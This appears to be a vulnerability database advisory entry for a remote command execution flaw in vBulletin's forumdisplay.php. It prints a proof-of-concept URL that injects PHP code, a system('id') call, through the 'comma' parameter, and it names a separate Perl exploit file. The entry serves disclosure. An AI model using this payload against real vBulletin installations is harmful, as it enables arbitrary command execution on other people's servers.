VBulletin Forumdisplay.PHP Remote Command Execution Vulnerability

info
discussion
exploit
solution
references

VBulletin Forumdisplay.PHP Remote Command Execution Vulnerability

An exploit is not required.

The following proof of concept is available:
http://www.example.com/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

The following proof of concept has been made available by pokleyzz <pokleyzz_at_scan-associates.net>:

/data/vulnerabilities/exploits/vbulletin304-xp.pl